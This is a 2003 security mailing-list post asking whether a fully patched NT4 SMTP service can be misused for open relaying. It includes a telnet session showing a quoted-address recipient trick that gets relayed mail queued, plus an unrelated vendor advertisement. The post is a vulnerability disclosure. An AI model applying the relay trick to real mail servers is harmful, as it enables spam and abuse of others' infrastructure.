Can NT4 SMTP Service be misused for mail spamming
From: st0ff st0ff (if0ff_at_YAHOO.COM)
Date: Mon, 25 Aug 2003 05:38:53 -0700 To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
I'm became aware, that it is possible to relay mails
on a fully patched NT4 box. The SMTP service, which is
part of the optionpack is the subject matter.
I've installed SP6a with the SRP Q299444 and the
newest IIS cumulative patch Q811114. The configuration
disallow to relay mails on this server, except for the
If I send an email as follows, the mail is going to be
> telnet 184.108.40.206 25
Connected to 220.127.116.11.
Escape character is '^]'.
220-foobar.com Microsoft SMTP MAIL ready at Wed, 25
Aug 2003 10:50:27 +0200 Version: 5.5.1877.197.19 220
ESMTP spoken here helo localhost
250 foobar.com Hello [18.104.22.168]
mail from: email@example.com
250 firstname.lastname@example.org....Sender OK
rcpt to: "email@example.com"@foobar.com
354 Start mail input; end with <CRLF>.<CRLF>
250 0892a4350054683343212 Queued mail for delivery
221 foobar.com Service closing transmission channel
Connection closed by foreign host.
Is that a bug, a misconfiguration or did I miss a
Thanks a lot
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
Whatever Happened to Octopus?
LEGATO RepliStor, formerly known as Octopus, delivers breakthrough
replication performance that's 5X faster than the competition in an
independent head-to-head test. Learn how RepliStor uses patented,
asynchronous, real-time replication, to deliver disaster recovery, data
distribution and consolidated backups. It is the first replication solution
to achieve Windows 2003 certification. Get the performance report now.